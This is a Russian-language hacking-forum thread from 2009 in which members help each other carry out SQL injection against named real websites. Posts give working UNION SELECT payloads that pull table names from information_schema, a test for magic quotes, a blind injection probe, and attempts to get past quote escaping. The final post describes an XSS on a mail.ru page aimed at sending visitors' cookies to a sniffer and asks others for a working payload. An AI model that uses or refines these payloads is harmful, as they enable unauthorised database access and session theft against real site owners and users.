15.07.2009, 16:45
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
.:[melkiy]:., попробуй файлик залить на хост, а потом грузить на форум удаленно, не со своего компа. У меня была такая ситуация.
Byrger, дальше после NOT IN свою колонку вставляешь. Почитай статьи о MsSQL инъекциях.
|
|
|
16.07.2009, 06:00
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
С нами:
9567480
Репутация:
61
|
|
Сообщение от mailbrush
.:[melkiy]:., попробуй файлик залить на хост, а потом грузить на форум удаленно, не со своего компа. У меня была такая ситуация.
Byrger, дальше после NOT IN свою колонку вставляешь. Почитай статьи о MsSQL инъекциях.
Ты видимо не прочёл что выше было...
У меня ковычка экранируется...
|
|
|
|
15.07.2009, 21:08
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
С нами:
9555536
Репутация:
95
|
|
уже в какой раз возникает одна и та же проблема, а именно в подборе имени таблицы, если база не показывает сразу все названия, а использовать limit 1,1 слишком долго...подскажитекак сделать это побыстрее (для начала пусть в 5-ой версии), а также, как определить, включены мэджики или нет, надо ли переводить в хекс или нет, воти лин для примера:
http://www.brainnet.org.au/brainnet/publications/pubs_abstract.jsp?PubID=-1+union+select+1,2,table_NAME,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+FROM +INFORMATION_SCHEMA.tables
|
|
|
|
15.07.2009, 21:16
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
С нами:
9030566
Репутация:
2017
|
|
Сообщение от jecka3000
уже в какой раз возникает одна и та же проблема, а именно в подборе имени таблицы, если база не показывает сразу все названия, а использовать limit 1,1 слишком долго...подскажитекак сделать это побыстрее (для начала пусть в 5-ой версии), а также, как определить, включены мэджики или нет, надо ли переводить в хекс или нет, воти лин для примера:
http://www.brainnet.org.au/brainnet/publications/pubs_abstract.jsp?PubID=-1+union+select+1,2,table_NAME,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+FROM +INFORMATION_SCHEMA.tables
http://www.brainnet.org.au./brainnet/publications/pubs_abstract.jsp?PubID=-1+union+select+1,2,group_concat(table_name),4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 ,25,26,27+from+information_schema.tables+group+by+ table_schema+limit+0,1
как определить, включены мэджики или нет,
http://www.brainnet.org.au./brainnet/publications/pubs_abstract.jsp?PubID=-1+union+select+1,2,'test',4,5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22,23,24,25,26,27
если есть слово test то off если ошибка то on
|
|
|
|
16.07.2009, 11:32
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
Код:
http://www.board.kr.ua/wap/adv.php?id=34+order+by+4
Как эту расскрутить?
Ты видимо не прочёл что выше было...
У меня ковычка экранируется...
Хекс, чар... |
|
|
|
16.07.2009, 11:59
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
mailbrush:
Код:
http://www.board.kr.ua/wap/adv.php?id=34+and+substring(version(),1,1)=4--+
|
|
|
|
16.07.2009, 12:11
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
Да о слепой я и без этого знаю, но вывода бы хотелось  |
|
|
|
16.07.2009, 12:16
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
С нами:
9567480
Репутация:
61
|
|
INSERT INTO vote_result (ip, name, vote_id, answer) VALUES ('94.0.0.0', 'guest', '1', '0\\\'')
Выходит такая ошибка.
Както можно обойти экраниковку ковычки по другому?
Пробовал ')--+ ')/* ')%23 ')# '){
Также пробовал менянь ' на %27
попробовал так сделать %2527)--
INSERT INTO vote_result (ip, name, vote_id, answer) VALUES ('94.0.0.0', 'guest', '1', '0%27)-- ')
Может ещё можно в Ип адрес инекцию сделать? Как передать браузеру другой ИП?
|
|
|
|
16.07.2009, 12:42
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
2 mailbrush: дык вроде нету
2 Byrger:
А смотря как этот IP определяется, если пишется х-форвадер, то можно, если реальный - то фиг. В общем вероятность очень мала, забей на IP
|
|
|
|
16.07.2009, 15:00
|
|
Постоянный
Регистрация: 12.05.2009
Сообщений: 395
С нами:
8947056
Репутация:
229
|
|
http://torg.mail.ru/337/res/?p3[price_from]=&p3[price_to]=&p3[delivery_id]=&p3[vendor_id][]="> XSS
Собственно подставил ссылку на сниффер но не работает (точнее отчета лога нету) 
Попробуйте ща потестить на своем сниффере... если все норм то дайте ваш запрос чтобы куки просылались (я потом изменю на свой сниффер) |
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
